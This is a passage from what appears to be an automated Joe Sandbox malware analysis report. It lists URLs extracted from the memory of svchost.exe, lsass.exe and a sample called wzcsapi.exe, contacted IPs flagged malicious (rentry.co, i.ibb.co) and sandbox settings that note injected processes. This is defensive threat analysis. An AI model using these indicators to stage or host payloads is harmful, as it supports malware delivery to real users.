                                          https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfsvchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://account.live.com/inlinessvchost.exe, 0000000B.00000002.2647979529.0000013DE1902000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://i.ibb.co(wzcsapi.exe, 00000003.00000002.2644119365.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.0000000002A7F000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000029A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80601=svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://login.microsoftonline.com/ppsecure/devicechangecredential.srfensvchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://ocsp.msocsp.lsass.exe, 00000009.00000000.1363146248.0000017D2D551000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://schemas.xmlsoap.org/soap/envelope/svchost.exe, 0000000B.00000002.2642526925.0000013DE18BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://osoft.co_2010-06Xdwm.exe, 0000000E.00000000.1381748007.00000262ED790000.00000004.00000001.00020000.00000000.sdmp, dwm.exe, 0000000E.00000002.2698819352.00000262ED790000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd:svchost.exe, 0000000B.00000002.2656318533.0000013DE2100000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2659982158.0000013DE215F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497639926.0000013DE2107000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://login.microsoftonline.com/MSARST2.srfsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://Passport.NET/STSsvchost.exe, 0000000B.00000003.1498001046.0000013DE2179000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2659179818.0000013DE2137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1517373013.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://login.microsoftonline.com/ppsecure/DeviceQuery.srf-svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000009.00000000.1362157507.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2644280399.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf%svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 0000000B.00000003.1517373013.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://i.ibb.cowzcsapi.exe, 00000003.00000002.2644119365.000000000299C000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.000000000292F000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.0000000002A83000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.000000000295E000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000029A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/02/trust/Issue502svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuelssvchost.exe, 0000000B.00000003.1517373013.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/wsdl/soap12/Plsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srf.svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://account.live.com/inlinesignup.aspx?iww=1&id=80600=svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAsvchost.exe, 0000000B.00000003.1586613115.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE2180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://login.microsoftonline.com/ppsecure/EnumerateDevices.srfsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://Passport.NET/tbMicrosoft-Windows-LiveId%4Operational.evtx.23.drfalse
                                                                                          		unknown
                                                                                          http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000009.00000000.1362157507.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2644280399.0000017D2CE4F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdsvchost.exe, 0000000B.00000003.1497639926.0000013DE2107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2666864067.0000013DE2813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1502565425.0000013DE2173000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1534241049.0000013DE2107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1502608348.0000013DE2176000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trustAAAAAsvchost.exe, 0000000B.00000003.1586613115.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE2180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://account.live.com/InlineSignup.aspx?iww=1&id=80502svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                http://Passport.NET/STS09/xmldsig#ripledes-cbcices/SOAPFaultcurity-utility-1.0.xsdsvchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewzcsapi.exe, 00000003.00000002.2644119365.00000000028C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://login.microsoftonline.com/ppsecure/devicechangecredential.srfMMsvchost.exe, 0000000B.00000003.1369948869.0000013DE2127000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://signup.live.com/signup.aspxsvchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://Passport.NET/tb_svchost.exe, 0000000B.00000002.2668258474.0000013DE2844000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        https://login.microsoftonline.com/MSARST2.srf=svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue2svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://i.ibb.cowzcsapi.exe, 00000003.00000002.2644119365.000000000296C000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000029A6000.00000004.00000800.00020000.00000000.sdmp, wzcsapi.exe, 00000003.00000002.2644119365.00000000029F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2659179818.0000013DE2137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586613115.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569867845.0000013DE210E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2659982158.0000013DE215F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE2180000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1498414598.0000013DE210E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497639926.0000013DE2107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1516335688.0000013DE215B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymoussvchost.exe, 0000000B.00000002.2659179818.0000013DE2137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://account.live.com/inlinesignup.aspx?iww=1&svchost.exe, 0000000B.00000002.2647979529.0000013DE1902000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfJsvchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://account.live.com/msangcwamsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1375112246.0000013DE212A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369560107.0000013DE2157000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srfsvchost.exe, 0000000B.00000002.2639318633.0000013DE1845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://crl.ver)svchost.exe, 0000000B.00000002.2645232189.0000013DE18BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    http://passport.net/tbsvchost.exe, 0000000B.00000002.2666864067.0000013DE2813000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      http://upx.sf.netAmcache.hve.8.drfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/Issueuesvchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-svchost.exe, 0000000B.00000003.1498329369.0000013DE210E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497639926.0000013DE2107000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdssvchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/Issuesvchost.exe, 0000000B.00000003.1570022776.0000013DE28D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1518283361.0000013DE2193000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            https://login.microsoftonline.com/ppsecure/DeviceAssociate.srfsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://account.live.com/Wizard/Password/Change?id=80601svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369015116.0000013DE2152000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369948869.0000013DE212C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		unknown
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/scsvchost.exe, 0000000B.00000002.2659179818.0000013DE2137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2659982158.0000013DE215F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://account.live.com/inlinesignup.aspx?iww=1&id=80601svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80600svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      http://schemas.xmlsoap.org/soap/envelope/=svchost.exe, 0000000B.00000002.2659982158.0000013DE215F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000009.00000000.1362110909.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000009.00000002.2643302111.0000017D2CE2F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issuesvchost.exe, 0000000B.00000002.2645982875.0000013DE18D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1569755635.0000013DE2169000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://login.microsoftonline.com/ppsecure/DeviceUpdate.srfsvchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          http://Passport.NET/tb:ppsvchost.exe, 0000000B.00000002.2645982875.0000013DE18D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2641180376.0000013DE1889000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            http://Passport.NET/tb_comsvchost.exe, 0000000B.00000002.2668258474.0000013DE2844000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdessvchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/Issueesvchost.exe, 0000000B.00000003.1586865759.0000013DE216E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trustnsvchost.exe, 0000000B.00000002.2659179818.0000013DE2137000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://account.live.com/inlinesignup.aspx?iww=1&id=80605svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      https://login.microsoftonline.com/ppsecure/deviceremovecredential.srfREsvchost.exe, 0000000B.00000003.1368955150.0000013DE2110000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://ctldl.winsvchost.exe, 0000000F.00000002.2688680497.000002234AEA4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://account.live.com/Wizard/Password/Change?id=806014svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://account.live.com/inlinesignup.aspx?iww=1&id=80603svchost.exe, 0000000B.00000003.1369603013.0000013DE2140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1369525790.0000013DE213B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://account.live.com/inlinesignup.aspx?iww=1&id=80604svchost.exe, 0000000B.00000003.1369760411.0000013DE2163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2640193453.0000013DE185F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdsvchost.exe, 0000000B.00000003.1497639926.0000013DE2107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1502565425.0000013DE2173000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1534241049.0000013DE2107000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1497126697.0000013DE216F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1502608348.0000013DE2176000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2660619812.0000013DE216F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                		unknown

                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                Public IPs

                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                104.26.2.16
                                                                                                                                                                                		rentry.coUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                162.19.58.157
                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                		209CENTURYLINK-US-LEGACY-QWESTUSfalse
                                                                                                                                                                                147.185.221.18
                                                                                                                                                                                		unknownUnited States
                                                                                                                                                                                		12087SALSGIVERUSfalse
                                                                                                                                                                                169.197.85.95
                                                                                                                                                                                		i.ibb.coUnited States
                                                                                                                                                                                		26548PUREVOLTAGE-INCUStrue

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                Analysis ID:1533949
                                                                                                                                                                                Start date and time:2024-10-15 11:19:13 +02:00
                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 10m 52s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                Number of analysed new started processes analysed:13
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:28
                                                                                                                                                                                Technologies:
